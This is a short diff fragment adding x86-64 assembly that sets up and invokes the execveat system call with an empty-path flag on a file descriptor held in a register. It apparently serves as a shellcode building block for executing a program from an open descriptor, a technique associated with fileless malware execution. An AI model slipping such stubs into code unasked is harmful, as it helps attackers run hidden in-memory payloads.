+    ;              const char *const *argv,
+    ;              const char *const *envp,
+    ;              int flags);
+
+    push 0x142
+    pop  rax
+    push r14
+    pop  rdi
+    push rsp
+    sub  rsp, 8
+    mov  rsi, rsp
+    xor  r10, r10
+    xor  rdx, rdx
+    push 0x1000
+    pop  r8
+    syscall
\ No newline at end of file